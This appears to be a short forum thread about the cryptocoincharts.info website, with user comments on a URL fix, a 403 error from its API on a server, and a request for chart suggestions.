If I remove the extra slash, things look ok.

https://cryptocoincharts.info/pair/uno/btc/averageprice/5-days

Anyway, thanks for the site! Useful information!

Regarding the API,

I get a 403 when trying requests from my server but works fine from my local machine. Is there some IP banning going on? Im not on any blacklists!

Hello,

we're looking to gather ideas on what charts people would like to see on cryptocoincharts.info. Come comment in this thread (https://bitcointalk.org/index.php?topic=2162032) if that's something that sounds interesting to you.
